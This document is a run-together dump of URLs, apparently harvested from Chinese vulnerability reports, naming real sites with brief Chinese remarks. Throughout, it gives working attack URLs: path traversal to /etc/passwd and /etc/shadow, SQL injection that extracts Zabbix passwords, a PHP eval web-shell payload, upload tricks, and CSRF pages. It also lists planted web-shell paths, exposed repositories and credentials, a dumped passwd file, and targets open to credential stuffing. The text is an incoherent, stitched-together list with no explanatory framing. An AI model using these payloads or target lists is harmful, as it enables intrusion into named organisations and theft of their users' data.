http://**.**.**.**/Singer.asp?http://**.**.**.**/Singer.asp?Classid=1&SClassid=&Nclassid=273 http://**.**.**/dylgy/Login.aspx http://**.**.**.**/site/list?cat_id=32 http://**.**.**.**/site/list?cat_id=32 http://**.**.**.**/site/list?cat_id=32 https://github.com/lxn91618/server-gitdepot/blob/401fb4bbe6b7afc82f98e0d6b066b8736538bea1/9AirSMS/zj/mail/SendMail.java http://yun.haodai.com http://dealer.auto.ifeng.com/manageback/login http://219.143.252.247:8083/ws_member.asmx?op=CheckMember http://219.143.252.247:8030/ws_member.asmx?op=CheckCallUser http://joycitycrmws2.cofco.com:8086/ http://www.iana.org/assignments/cont-disp/cont-disp.xhtml#cont-disp-1 http://survey.pptv.com/admin http://career.sdebank.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://career.sdebank.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://career.sdebank.com/iufotempfile/of9y4z8574x0iyshzjir0r966glinc/utl_webshell_150248.jsp http://charge.bydauto.com.cn/ http://charge.bydauto.com.cn/charge/Service.asmx http://charge.bydauto.com.cn/charge/Service.asmx http://tempuri.org/GetPilesByPage2 xmlns:i="http://www.w3.org/1999/XMLSchema-instance xmlns:d="http://www.w3.org/1999/XMLSchema xmlns:c="http://schemas.xmlsoap.org/soap/encoding/ xmlns:v="http://schemas.xmlsoap.org/soap/envelope/ http://tempuri.org/ http://vip.cofco.com:8081/ http://vip.cofco.com:8081/12.zip https://**.**.**.**/winner/xbzq/index.html https://**.**.**.**/invoker/EJBInvokerServlet https://**.**.**.**/invoker/JMXInvokerServlet http://ekp.joyu.com http://m.mail.sohu.com/entry这个是搜狐闪电邮箱移动版的登陆位置,登陆位置没有验证码限制 http://iac.hit.edu.cn/moreNews.asp?NewsID=130&BigClassID=6&SmallClassID=10 http://iac.hit.edu.cn/peopleinfo.asp?id=%D6%DC%D3%F1 http://iac.hit.edu.cn/admin/index.asp http://**.**.**.**/ http://**.**.**.**/web/ http://**.**.**.**/info.aspx http://**.**.**.**/pay/index.html 
http://**.**.**.**/Main.aspx http://**.**.**.**/portal/itsmlogin http://**.**.**.**/homeLogin.action http://**.**.**.**:8991/F/BXFIG1K7LJRTQEA2U2AHN9URJ8UAI1N221C1MC135PF4K2XEEJ-07348?func=file&file_name=login-session http://woxin.jxict.cn/jstorm-ui/cluster.jsf http://woxin.jxict.cn/jstorm-ui/log.jsf?clusterName=&host=10.180.117.12&port=7621&parent=.&log=../../../../../../../../../../etc/shadow http://woxin.jxict.cn/woxin-admin/query/exportClientRecommendStatistic.do http://schoolhouse.bjedu.gov.cn/schoolhouse/login.jsp http://video1.dynns.cnuninet.com/manager/login.cfm http://**.**.**.**/Account/Login.aspx http://**.**.**.**/bugs/wooyun-2010-0105249 http://**.**.**.**/bugs/wooyun-2010-0105249 http://**.**.**.**/survey/login.aspx http://**.**.**.**/adm/InfoDetails.aspx?id=48 http://schoolhouse.ec.js.edu.cn/schoolhouse/login.jsp bbs.360safe.com/adminop.php http://yuyin.baidu.com/,貌似基本没有对输出进行过滤,各种储存型xss。 www.scti.cn http://www.scti.cn http://mensao.app.yaolan.com/Test http://**.**.**.**/xinli/TeaShow.aspx?TypeNo=47&teaNo=7 http://m.onlylady.com/ http://m.onlylady.com:80/ http://58.32.246.78:8380/ http://58.32.246.78:8380/jmx-console/ http://**.**.**.**/noticespic/da20142019102046.jsp http://**.**.**.**/bugs/wooyun-2010-096354 http://**.**.**.**/WebGroup.aspx?tpid=0&classid=85&groupid=59 http://crm.189.cn/ltePortal/ http://report.chunshuitang.com http://mingjia.zhiyin.cn/uc_server/admin.php shell:http://mingjia.zhiyin.cn/uc_server/c1.php http://t5.flygps.com.cn/ http://t5.flygps.com.cn/userfile/userinfo/1903585/face.aspx http://myadmin.zol.com/index.php?c=Merchant_MerchantManage&a=Default&firstMenuId=0&permitId=3 index.php/Information/detail/id/232*.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71 http://www.oeeee.com奥一网主站登陆框接口,未做登陆验证限制 http://fenxiao.lvmama.com:80/ http://43.250.15.233/manager/html http://43.250.15.234/manager/html http://amway.social-touch.com http://yangguangfeilun.social-touch.com http://newbi.social-touch.com http://pro.social-touch.com 
http://wechat.social-touch.com http://srp.social-touch.com http://**.**.**.**/interplugin/fdinfo/search.jsp?tableId=14 index.php/Index/content_zh/id/1220*/link/rcpy http://**.**.**.**:80/index.php/Index/content_zh/id/1220 http://110.249.218.73:9080/hotelbs164/default.aspx http://121.22.40.178:8090/hotelbs/default.aspx http://121.22.40.204:8090/hotelbs/Login.aspx http://219.140.161.86:8080/ http://**.**.**.**/zscsxt/bmgl/XsbmwhBmbPrint.action?tableID=4001 http://pic.ci123.com/?types=2 inurl:http://www.epicc.com.cn/EbsWeb/CARDSAVE.do http://www.epicc.com.cn/EbsWeb/CARDSAVE.do?UIAction=showResult&orderId=0a94ad0c441479ad425fed51439884f0 http://www.epicc.com.cn/EbsWeb/CARDSAVE.do?UIAction=showResult&orderId=476d2506f5de21d30a79cf560408b67e http://www.teachina.com/editor/xheditor/src/xheditor-zh.aspx http://222.211.79.137:9080/security/authen http://123.57.205.35:7001/jmxroot/warning.jsp jdbc:oracle:thin:@10.51.66.87:1521:orcl http://ad.henan.sina.com.cn/acer2010/js/vote_js.php?p_id=1 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/web_joblist.aspx?CompID=20150531211633218 http://**.**.**.**/web_company.aspx?CompID=20150531211633218 http://**.**.**.**/login_jobpanduan.aspx?UserName= http://ilife.homelink.com.cn/aigou/index.php?c=index&a=detail_pic&id=10469%27%20and%20%271%27=%271 http://ilife.homelink.com.cn/aigou/index.php?c=index&a=detail_pic&id=10469%27%20and%20%271%27=%272 http://amway.social-touch.com/admin/login,抓到一个get请求 http://amway.social-touch.com/admin/userInfo,发送get请求,duang,只有管理用户才可以看到的用户敏感数据全被我们看光了,而且里面所有连接全部有效,可以尽情愉快地玩耍了 http://**.**.**.**/s/getSelect.action?param=0存在注入漏洞,参数param http://123.125.116.123/../../../etc/passwd http://123.125.116.123/../../../etc/hosts http://220.181.2.41/../../../etc/passwd http://pt17.aimererp.com/ http://180.166.221.122:81/ http://i.28.com/index.php http://**.**.**.**/action/front/indexAction_prepareIndex http://**.**.**.**/action/front/investigateAction_updateInvestigate(POST) 
http://**.**.**.**/action/front/indexAction_initUploadedFile?uniqueURL=../../../../../../../../../../etc/passwd%00.jpg http://oa.social-touch.com/index.php?controller=login&action=index&1=noCookie&2=%E8%AF%B7%E9%87%8D%E6%96%B0%E7%99%BB%E5%BD%95 http://**.**.**.**/portal/HomePage!search.do http://db1.xiaozufan.cn/.svn/entries http://db3.xiaozufan.cn/.svn/entries http://db1.xiaozufan.cn/wss https://github.com/Shoukichi/WorkFiles http://211.91.224.232/mms/ jdbc:oracle:thin:@192.168.103.10:1521:mmsdb http://211.91.224.232:8081/mcp/cxf/services http://211.91.224.232:8080/cms http://211.91.224.244/resources http://211.91.224.244:9009/services/VacSync http://211.91.224.244:9007 http://211.91.224.244:9008 http://211.91.224.244:8161/admin user:openstack user:openstack user:openstack http://122.13.0.18:8080/ user:admin passwd:qz***cS_1 http://211.91.224.232/m***/ http://211.91.224.232/c***/ http://211.91.224.232/mob***/ http://211.91.224.232/reso***/ MMS-STATIC-ASSETS:http://211.91.224.230:8080/static_***ts/ http://122.13.0.56/svn/repos/ http://www.xin.com:80/ajax/top_load/ http://wechat.youku.com/login/index http://events.oppo.com/2015/r7placerace/.git/config http://events.oppo.com/oppoxantm/.DS_Store http://events.oppo.com/index.zip http://**.**.**.**:81/userlogin.aspx,用户名sql注入 http://123.103.13.151/ http://**.**.**.**/dcms/bms/login.jsp http://www.ssports.com/view/resetpwd.shtml?val=18600001111 http://**.**.**.**/Jygy/home/id/274.htm http://oa.tianya.cn//resin-doc/examples/security-basic/viewfile?file=index.jsp http://oa.tianya.cn//resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160 http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160 http://office.mingyi.com.cn/ http://myph.mingyi.com.cn/control.aspx http://cbs.cninsure.net/logon/Login.jsp http://www.miicaa.com:10001/console http://121.40.30.228/console http://www.net.cn/ 
https://**.**.**.**/solemichael/omni/blob/ca0e78da05f44909917b13a2841d4c1d0fa50c08/src/main/java/org/omni/remote/email/impl/TextEmailSender.java http://www.pigai.org/用户跟管理员都可以登陆的接口。 http://tc.homelink.com.cn/Superagent/Superagent00.aspx http://tc.homelink.com.cn/Superagent/Reports02.aspx?UniqNo=373 http://tc.homelink.com.cn/Superagent/Reports02.aspx?UniqNo=373 http://www.camera360.com/用户登录可撞库 https://cloud.camera360.com/third/otherUser/otherLogin?jsonpCallback=jQuery1706136869133915752_1440297967198&username=wi-67@163%2ecom&password=737d4d5bac083df74a8cc171b462f397&sname=login&vcode=&rememberMe=0&_=1440298835423 http://update.ma43.163.com/login_cbt.list更新服务器列表 http://106.2.39.147:8011/ http://106.2.39.147:8011/conf/config.inc http://www.ahgyjt.com.cn/ http://61.191.18.251:8080/oa/windex.jsp http://www.gogo.cn/daily/user/login http://bbs.icalew.com/login.asp http://lm.meilishuo.com/ http://mall.gtja.com/) https://one.gtja.com) http://mall.gtja.com/zt/hlwjr/CVS/Root http://mall.gtja.com/zt/hlwjr/CVS/Entries https://one.gtja.com/yht/CVS/Root https://one.gtja.com/yht/CVS/Entries pserver:huangjinxin@10.176.64.121:/GTJACVS index.jsp/1.1/Thu favicon.ico/1.1/Mon index.jsp/1.6/Tue interfaceMonitor.jsp/1.1/Mon ssoWeb.html/1.1/Mon test.jsp/1.1/Mon pserver:huolong@cvs.cssweb.sh.cn:/cvs_2010/project/gtja www.cqpds.com http://ascforex.com/zh-cn/read.jsp?id=1,如图所示: http://ascforex.com/zh-cn/read.jsp?id=11,如图所示: success:true,message:'上传成功',data:{src:'/upfile/images/2015-8/2323431.aspx'},total:1,errors http://ascforex.com//upfile/images/2015-8/2323431.aspx,如图所示: ip:27.223.70.24 http://www.360jjcg.com/ http://**.**.**.**/fckeditor//editor/filemanager/connectors/test.html http://**.**.**.**/fckeditor//editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/1.asp&NewFolderName=x.asp http://dsp.donews.com www.cnzz.com http://admin.sgst.cn/htzh/user.do?act=login 
http://119.254.70.128这个站测试下字典的,就在以前的漏洞中找了几个用户名,还真有不少弱口令。Wooyun搜索了一下这个站,以前爆过漏洞,看到以前注入、上传等各种问题,手贱测试了下,上传没成功,手工没注入时,返回是下面的样子,看来是都修复了啊。 http://www.podinns.com/ http://**.**.**.**/ http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=2&name=members http://mys8.super8.com.cn:81/Login.aspx http://**.**.**.**/ http://ee403.hit.edu.cn/database.rar http://**.**.**.**/jmx-console/ http://staff.cntv.cn/ http://59.108.36.117:8000/WebResource.axd?d=1440148493可能存在oracle http://116.236.205.179/ids/admin/main.jsp test:111111 http://space.show.sina.com.cn/video_on.php?space_uid=233110&videoid=1182 http://game.feng.com/game/infoDetail/2015-05-05/index.php?r=gamenew/infoDetail/getFavoriteInfo http://yimin.edai.com/manager/ http://**.**.**.**/jsp/zc2_form2_step2.jsp?userName=admin1&flzx=null https://www.gzekt.com/payServlet www.gzekt.com https://www.gzekt.com http://my.zhinei.com//space.php?do=news&name=1&type=1&page=1 www.zuk.com root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin 
postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin www:x:500:502::/home/www:/bin/bash zabbix:x:501:503::/home/zabbix:/bin/bash http://creative.pptv.com/share/detail?id=49 http://train.tcl.com.cn/DRP/ http://train.tcl.com.cn/DRP/login.action http://wsb.tcl.com/isp/login.aspx http://wsb.tcl.com/isp/vstwebfao/basesetting/PersonEdit.aspx?email=bolm%40tcl.com&type=gr http://www.wandonganxin.cn/ImgList.aspx?fcol=005 http://221.228.208.230/ http://121.40.30.228/console site:www.99bill.com http://**.**.**.** http://**.**.**.**/login.html http://top.gaoloumi.com/citylist.php?id=57 easy.huawei.com/www.rar http://61.183.121.210:1979/ http://61.183.121.210:1979 http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001 http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx http://zuchebang.net:8087/ http://www.niuyw.com/index.php?m=Home&c=Download&a=archive&id=13 http://softcoreonline.huawei.com/app/front/faq!list.action http://softcoreonline.huawei.com/front/faq!list.action http://softcoreonline.huawei.com/app/front/app!checkMobile.action?appIds=402880823c1e6e77013c1e7710e50001,402880e43c0b3094013c0b31465b0001,402880823c1e6e77013c1e79016a0003,402880e53c0df5db013c0df743310001&applyInfo.mobile=-1 site:img.58cdn.com.cn,然后得到大量合同信息 http://**.**.**.**/bugs/wooyun-2015-0116307 http://**.**.**.**/ http://zz.yiban.cn/ajax/comm_ajax.php?action=default_skin http://t.jztbox64.test.58v5.cn/weixingame/wt/manageMeijiaActivitiesPage http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=376 http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=376 http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=377 http://mrp5.7daysinn.cn/pur802a.web/forms/formorderprint.aspx?unityno=&chainid=378 
http://www.21cake.com/member-save_setting.html http://xss.gift/21cakecsrf.html https://119.233.188.79/por/login_psw.csp?rnd=0.6216886338753285 http://192.168.94.1/login.aspx http://211.151.20.241/ http://211.151.20.241/online1.4.01/android/SrvVersion.xml http://211.151.20.241/OpenBeta1.3.02/android/SrvVersion.xml http://emobile.weaver.com.cn/customerproduce.do?serverVersion=NC45# http://oa.open.com.cn/tableApply/tableApplySelect http://oa.open.com.cn/user/useraddresslist http://ec.sinopec.com/supp/index.shtml http://ec.sinopec.com/ready/order1.html http://ec.sinopec.com/ready/workflow.html http://ec.sinopec.com/1%E6%90%9C%E7%B4%A2%E5%8A%9F%E8%83%BD%E4%BC%98%E5%8C%96.html http://ec.sinopec.com/supp/lianxi.xlsx ec.sinopec.com/supp/wuzhileibie.docx http://**.**.**.**:7072/login.aspx http://m.21cake.com/passport-lost.html http://www.yaofang.cn/a/user/Update_Profile http://xss.gift/yaofangcsrf.html http://www.open.com.cn/tools/submit_ajax.ashx?action=profile_edit http://xss.gift/opencsrf.html http://**.**.**.**/bugs/wooyun-2015-0121611 http://www.tclcomm.cn/news_content.asp?articleid=2114 http://**.**.**.**/querycontent.action http://**.**.**.**/downAction.action?fileName=index.jsp&higher_id=4 http://**.**.**.**/downAction.action?fileName=WEB-INF/web.xml&higher_id=4 inurl:getOrderSuccedDetail http://www.kugou.com/shop/order/getOrderSuccedDetail?order_no=201508140945452297080 http://www.kugou.com/shop/order/getOrderSuccedDetail?order_no=201508141221579120694 http://www.kugou.com/shop/order/getOrderSuccedDetail?order_no=201508141019479944252 http://**.**.**.**/ http://shenzhen.haodai.com/xindai/admindetail?id=12892 http://**.**.**.**/zpxxview.php?newsid=707 http://**.**.**.**/zpxxview.php?newsid=707 http://**.**.**.**/zpxxview.php?newsid=707 http://www.speedcn.net/news/NewsList.php?Host=,36,48 http://222.179.234.145/guestbook/list/portalId/86/cid/828 http://hxhgsyzx.yznu.cn//guestbook/list/portalId/86/cid/828 http://aexp.zjsru.edu.cn/guestbook/list/portalId/662/cid/6903 
http://etc.cqmu.edu.cn/guestbook/list/portalId/33/cid/586 http://physics.lab.scu.edu.cn/guestbook/list/cid/3681 http://hxss.lab.scu.edu.cn/guestbook/list/portalId/262/cid/2016 http://211.151.62.140/Web%20References/ www.bjxd2sc.com,访问一下: http://110.249.218.73:9080/hotelbs164/Login.aspx http://**.**.**.**/bugs/wooyun-2010-0125687 http://www.chinabus.info/admin/js/upload.asp http://www.chinabus.info/pics/w.asp http://www.kugou.com/shop/user/addCommonAddress http://xss.gift/kugoucsrf.html www.apicloud.com http://user.ci123.com/account/EditUserInfo/detail http://xss.gift/yuercsrf.html http://222.190.116.172:9090/biplatform/sysLoginVerif.action http://t.95105555.com:9001/querySoft.action?name=a&type=1 http://**.**.**.**/zfxxgk/ysqgk/index.htm http://**.**.**.**/rcjl/outersearchPositionAction.do https://**.**.**.**/colincheng1016/LAUBE/blob/0eea31e20594ab42a561c46c49106b9a57550a8b/WebRoot/WEB-INF/eccom/config/mail.properties http://**.**.**.**/portal/security/login.xhtml http://**.**.**.**/Html/2015-8-21/Qpaper.Html http://www.gzbtte.net/admin http://**.**.**.**/trms/RackInfo.php?RackCD=330 http://115.231.105.56:8088/ http://42.62.21.44/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://jk.yaxia.com/login.php https://**.**.**.**/LoganDiger/hr/blob/3d5da121ee30039b851a08338a69d05eebafba8a/.svn/pristine/aa/aa9d609258441e105cc3639c591683dbc97b199a.svn-base http://www.yiban.cn/feed/add http://**.**.**.**/ http://gps.hznpt.com/Login.aspx http://gps.hznpt.com/Functions/data/detailCarInfo.aspx?id=101469 http://gps.hznpt.com/Functions/data/detailCarInfo.aspx?id=101469 http://gps.hznpt.com/Functions/data/detailCarInfo.aspx?id=101469 http://**.**.**.**:1300/ http://www.21cake.com/passport-lost.html 
http://58.63.38.180:9080/security/login?module http://old.ab95569.com/webins/ec/onlineSearchController.do?method=claimState&par=9060503202015000040&newflag=1&plyNO=2060503202014001800&icflag=1 http://old.ab95569.com/webins/ec/onlineSearchController.do?method=claimState&par=9030003202015000252&newflag=1&plyNO=2030003202014006658&icflag=1 http://**.**.**.**/ http://www.weifengke.com/map.html http://**.**.**.**/search/ http://redmine.emar.com/redmine/projects http://**.**.**.**/gz/xy/ http://wzb.hebtu.edu.cn/tongzhi.php?id=292 http://www.szytou.com/backpwd https://**.**.**.**/iXueping/obd2/blob/b16264f794698cf384053737e2f7e350b4675008/test/cn/voicet/metronic/email/MailTest.java http://mail.ucfgroup.com http://wm2.mail.cntv.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.165.145:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://www.bjcsf.com.cn/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://webmail.800buy.com/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://mail.ccig.com/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg http://61.175.193.195/webroot/login.php?Lang=../../../../../../../../../../etc/hosts%00.jpg http://221.130.182.230/igenus/login.php http://www.bjcsf.com.cn/login.php http://webmail.800buy.com/login.php http://mail.ccig.com/login.php http://61.175.193.195/webroot/login.php http://ms.itesting.cn/ http://mail.znufe.edu.cn/ http://mail2012.steelhome.cn/ http://mail2011.steelhome.cn/login.php http://mail.lkpc.com/ http://mail.germes.com.cn/ http://mail.chlitina.com.cn/ http://mail.airenhe.com/ http://211.151.135.17/ http://211.151.135.40/ http://203.156.205.53//login.php http://121.101.219.139/ http://mail.yxms.cn/webroot//login.php http://cmri1.hiall.com.cn/3306.txt http://www.mediav.com/ http://www.kingcms.com/download/k9/  
http://www.focuznet.com/k9/t3012/ http://wooyun.org/bugs/wooyun-2015-0100601 http://**.**.**.**:80/getNewsContent.action http://**.**.**.**/gk_media/gnwjdyth/home.asp?so_sec_id=63&so_id=145513 http://**.**.**.**/products/pro_list.asp?products_sort=21 http://**.**.**.**/learn/index.asp?search_key=3&search_mode=2 http://**.**.**.**/manage/user/mail_subscibe.asp?mail=test@**.**.**.**&a_kanwu=1&a_kanwu=2&a_kanwu=3&a_kanwu=4&a_type=1&Submit=%CC%E1%BD%BB http://**.**.**.**/ http://地址/download.php?filename=../../../../etc/passwd http://222.29.240.102/ http://114.251.197.177/LoginCaiBan/UserLogin.aspx http://114.251.197.178/login/pmo/login.jsp www.emsgz.com http://www.c21wuhan.com.cn/news.html?types=1 http://www.qzyy.net.cn/news_detail_all.asp?id=19304 http://drops.wooyun.org/papers/3268 https://mail.30wish.net/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://www.nid.com.tw/nid/ASP/login.asp?logout=Y www.nid.com.tw www.nid.com.tw http://www.nid.com.tw http://apt.so/niaooo http://www.wushidou.cn/data.php?table=other&game=20a7d77ea9ae9d32370f8c03aa3502e3232cf78b bj.mangocity.com/visa/online.jsp http://**.**.**.**/login.do?message=102&verify= http://**.**.**.**/login.do?message=103&verify= http://**.**.**.**:89/login.do http://wiki.ops.cntv.cn/s/zh_CN/3145/3/1.0/_/images/../WEB-INF/web.xml http://edu.qq.com/a/20061207/000060.htm http://www229.clickeye.cn/network/clickeye.js http://**.**.**.**.mo/c_news/radio_news.php?id=265373 http://**.**.**.**/Address/AddAddress?ReturnPage=http://**.**.**.**/Address/AddressList&AddressId=259 http://**.**.**.**/Bank/AddBank?ReturnPage=http://**.**.**.**/Bank/BankList&BankId=283 http://**.**.**.**/Query/Per/Query_PerList.aspx http://www.apicloud.com/resetBySms www.apicloud.com http://www.apicloud.com http://me.hit.edu.cn/lab/newslist.aspx?newclassid=89 http://**.**.**.**/Default.aspx http://**.**.**.**/Database/SiteWeaver.mdb 
http://xss.gift/58csrf.html http://open.weimob.com/style.php http://fang.58.com/ajax/upload.php?input=pic1&img=img1 bbs.xinhehui.com/uc_server http://www.21cake.com/passport-lost.html填入自己手机号,正常填入验证码 http://www.etonmobile.com/index.php?g=Admin&m=Login http://wo.fql.me/ http://tcm.iquanyou.com.cn/tcm/userLogin.action http://jpkc.onlinesjtu.com/zzxyl/sztl/alfx_content.asp?id=9 http://sys.dfss.com.cn/ckfinder/ckfinder.html http://**.**.**.**/readnews.asp?id=8765 http://**.**.**.**/web/showone.asp?lm2=22 http://**.**.**.**/list.asp?n_kind=56&Types=56 http://**.**.**.**/show.asp?id=3182 http://**.**.**.**/zsyz.asp?id=26 http://**.**.**.**/wlwz.asp?id=29 http://**.**.**.**/wzjdx.asp?id=20 http://**.**.**.**/show.asp?cataId=A00160001&newsId=8379 http://**.**.**.**/vod.asp?cataId=A00160007&newsId=8404 http://**.**.**.**/Show.asp?cataId=A00030006&newsId=8366 http://**.**.**.**/Show.asp?CataId=A00160008&newsId=8265 http://**.**.**.**/sin_art.asp?id=20 http://**.**.**.**/art_list.asp?id=2 http://**.**.**.**/wsbs_more.asp?classid=14 http://**.**.**.**/list/Gklm.asp?id=140 http://**.**.**.**/hdq/hdq_wszx_faq_show.asp?id=11947 http://**.**.**.**/show.asp?id=1273 http://**.**.**.**/zjtl/showall.asp?table=tms2005&n=地理位置&lb1=1&lb2=9&fid=53 http://**.**.**.**/xwzxshowall.asp?table=tnews&n=铁岭要闻&fID=32943 http://**.**.**.**/E_ReadOpinion.asp?OpinionID=1549 http://www.gps199.com/login.aspx http://www.szpswl.com/Login.aspx http://www.gpscx.com/index.aspx http://its666.com/ http://www.szpswl.com/Functions/data/detailCarInfo.aspx?id=105337 http://www.gps199.cn/Functions/data/detailCarInfo.aspx?id=105337 http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377 http://www.gpscx.com/Functions/data/detailCarInfo.aspx?id=105377 http://**.**.**.**/oa/login.jsp http://**.**.**.** http://www.c-web.com.cn/ http://www.mescake.com/存在任意账号注册漏洞 
http://**.**.**.**/Admin/examInfo/fileTmp/1622_%E5%AE%9C%E5%AE%BE%E5%8E%BF%E4%BA%8B%E4%B8%9A%E5%8D%95%E4%BD%8D2014%E5%B9%B4%E7%AC%AC%E4%B8%80%E6%AC%A1%E5%85%AC%E5%BC%80%E6%8B%9B%E8%81%98%E5%B7%A5%E4%BD%9C%E4%BA%BA%E5%91%98%E6%8B%9F%E8%81%98%E7%94%A8%E4%BA%BA%E5%91%98%E5%90%8D%E5%8D%95.htm http://**.**.**.**/Admin/examInfo/fileTmp/1372_%B9%D2%CD%F8=%B1%A8%C3%FB%BB%E3%D7%DC%A3%A8%C8%B7%B6%A8%A3%A9.htm http://bj.mangocity.com/visa/article.jsp?jspmaker_act_id=101 http://open.99bill.com/menu!AttachDownload.do?attach= http://open.99bill.com/menu!AttachDownload.do?attach=../../../../../../etc/passwd nursing.sysu.edu.cn/main/news/NewsList.aspx?no=168&pId=116 hcc2015.huawei.com/cn/CheckWorkingEmail u7406-http://be.zhinanmao.com/ http://be.zhinanmao.com/#tripfeedbacklist http://be.zhinanmao.com/#tripfeedbacklist http://be.zhinanmao.com/ http://59.151.12.39/Home/Index# http://59.151.12.38:89/ http://**.**.**.**/house/fangchan.asp?id=4787 http://**.**.**.**/ http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyWorkEdit.jsp?id=1 http://**.**.**.**:800/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://**.**.**.**:8080/pweb/careerapply/HrmCareerApplyWorkView.jsp?id=1 http://e-biding.gb246.com/global_Login.do http://crm.gb246.com/.svn/entries http://mail.gb246.com/.svn/entries http://vip.gb246.com/.svn/entries http://**.**.**.**:800/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where http://**.**.**.**:8080/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/SectorInfoBrowser.jsp?sqlwhere=where 
http://**.**.**.**:800/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**:8080/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://**.**.**.**:800/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://**.**.**.**:8080/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://**.**.**.**/web/broswer/CustomerSizeBrowser.jsp?sqlwhere=where http://v1.zhinanmao.com/?r=search%2Fsearch&seatxt=11&search_class=1 http://**.**.**.**,泄露考生信息 http://pgsd.sysu.edu.cn/dongtaizhongji.asp?cate=2&id=1439 http://haier.quanshi.com/ www.gogo.cn http://www.gogo.cn/?s=/abc/abc/abc/${@print%28eval%28$_POST[c]%29%29 http://**.**.**.**/ceo.asp?id=10 http://地址/~C:/WINDOWS/system32/drivers/etc/hosts http://**.**.**/gg_show.aspxid=@@version http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/webdisk//gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ http://**.**.**/gg_show.aspxid=@@version_ 